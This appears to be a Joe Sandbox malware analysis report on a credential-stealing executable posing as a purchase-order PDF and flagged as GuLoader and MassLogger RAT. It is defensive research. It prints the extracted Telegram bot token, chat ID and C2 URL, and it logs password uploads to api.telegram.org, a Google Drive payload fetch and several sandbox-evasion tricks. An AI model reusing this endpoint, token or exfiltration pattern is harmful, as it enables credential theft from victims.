Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PURCHASE ORDER TRC-0909718-24_pdf.exe

Overview

General Information

Sample name:PURCHASE ORDER TRC-0909718-24_pdf.exe
Analysis ID:1576421
MD5:95611e69a35eafc00725b14abcc7cc1a
SHA1:ce2e851da7726a726c4232463cf2ddd2e96ab27d
SHA256:e6a47a3ccdb6e669409024f10c2d1ebddb97d93b8c8eda17055ba377207f62a0
Tags:exeGuLoaderuser-threatcat_ch
Infos:

Detection

GuLoader, MassLogger RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected MassLogger RAT
Yara detected Telegram RAT
AI detected suspicious sample
Disable Task Manager(disabletaskmgr)
Disables CMD prompt
Disables the Windows task manager (taskmgr)
Initial sample is a PE file and has a suspicious name
Sample has a suspicious name (potential lure to open the executable)
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"C2 url": "https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendMessage"}
{"EXfil Mode": "Telegram", "Telegram Token": "7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc", "Telegram Chatid": "7382809095"}
SourceRuleDescriptionAuthorStrings
00000004.00000002.2946780486.0000000035DFA000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000004.00000002.2946780486.0000000035DFA000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000004.00000002.2946780486.0000000035DFA000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000000.00000002.2006375263.0000000005405000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          00000004.00000002.2918352521.0000000003F75000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Click to see the 3 entries
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-17T03:29:57.845766+010020577441Malware Command and Control Activity Detected192.168.2.449742149.154.167.220443TCP
            2024-12-17T03:30:01.216537+010020577441Malware Command and Control Activity Detected192.168.2.449749149.154.167.220443TCP
            2024-12-17T03:30:14.445035+010020577441Malware Command and Control Activity Detected192.168.2.449785149.154.167.220443TCP
            2024-12-17T03:30:22.223697+010020577441Malware Command and Control Activity Detected192.168.2.449803149.154.167.220443TCP
            2024-12-17T03:30:25.891903+010020577441Malware Command and Control Activity Detected192.168.2.449815149.154.167.220443TCP
            2024-12-17T03:30:30.827003+010020577441Malware Command and Control Activity Detected192.168.2.449827149.154.167.220443TCP
            2024-12-17T03:30:35.275690+010020577441Malware Command and Control Activity Detected192.168.2.449839149.154.167.220443TCP
            2024-12-17T03:30:38.521348+010020577441Malware Command and Control Activity Detected192.168.2.449850149.154.167.220443TCP
            2024-12-17T03:30:44.060895+010020577441Malware Command and Control Activity Detected192.168.2.449863149.154.167.220443TCP
            2024-12-17T03:30:48.646565+010020577441Malware Command and Control Activity Detected192.168.2.449875149.154.167.220443TCP
            2024-12-17T03:30:51.952053+010020577441Malware Command and Control Activity Detected192.168.2.449885149.154.167.220443TCP
            2024-12-17T03:30:56.279726+010020577441Malware Command and Control Activity Detected192.168.2.449898149.154.167.220443TCP
            2024-12-17T03:31:00.594692+010020577441Malware Command and Control Activity Detected192.168.2.449907149.154.167.220443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-17T03:29:47.537292+010028032742Potentially Bad Traffic192.168.2.449738193.122.130.080TCP
            2024-12-17T03:29:55.662432+010028032742Potentially Bad Traffic192.168.2.449738193.122.130.080TCP
            2024-12-17T03:29:59.302938+010028032742Potentially Bad Traffic192.168.2.449748193.122.130.080TCP
            2024-12-17T03:30:12.490733+010028032742Potentially Bad Traffic192.168.2.449755193.122.130.080TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-17T03:29:40.007753+010028032702Potentially Bad Traffic192.168.2.449736142.250.186.174443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000004.00000002.2946780486.0000000035DFA000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc", "Telegram Chatid": "7382809095"}
            Source: PURCHASE ORDER TRC-0909718-24_pdf.exe.7716.4.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendMessage"}
            Source: PURCHASE ORDER TRC-0909718-24_pdf.exeVirustotal: Detection: 47%Perma Link
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: PURCHASE ORDER TRC-0909718-24_pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49739 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49742 version: TLS 1.2
            Source: PURCHASE ORDER TRC-0909718-24_pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeCode function: 0_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405846
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeCode function: 0_2_00406398 FindFirstFileW,FindClose,0_2_00406398
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeCode function: 4_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_00405846
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeCode function: 4_2_004027FB FindFirstFileW,4_2_004027FB
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeCode function: 4_2_00406398 FindFirstFileW,FindClose,4_2_00406398

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49749 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49803 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49742 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49785 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49875 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49898 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49827 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49863 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49885 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49850 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49815 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49839 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49907 -> 149.154.167.220:443
            Source: unknownDNS query: name: api.telegram.org
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1e18c888856fHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1e43f72e9d46Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1edc6a8bed6eHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1f3010ecdd81Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1f5c280312c3Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1f9130a6ddecHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1fc089a266c5Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1feba30ad185Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd203aaca394ffHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd208b8ee19467Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd20cb4a9bb649Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd21359d38fd7bHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd21a2e32dbc29Host: api.telegram.orgContent-Length: 1090
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49738 -> 193.122.130.0:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49755 -> 193.122.130.0:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49748 -> 193.122.130.0:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49736 -> 142.250.186.174:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Juh7AeT-lysRqJEoEbbuZIeXvcWeNVKy HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1Juh7AeT-lysRqJEoEbbuZIeXvcWeNVKy&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49739 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Juh7AeT-lysRqJEoEbbuZIeXvcWeNVKy HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1Juh7AeT-lysRqJEoEbbuZIeXvcWeNVKy&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1e18c888856fHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035DFA000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035F2F000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035ED7000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000036045000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035F2F000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035D50000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035ED7000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000036045000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035DFA000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035F2F000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035CD1000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035D50000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035ED7000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000036045000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035CD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2947972912.00000000385C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/-B
            Source: PURCHASE ORDER TRC-0909718-24_pdf.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
            Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035CD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namex
            Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035DFA000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035F2F000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035ED7000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000036045000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035DFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
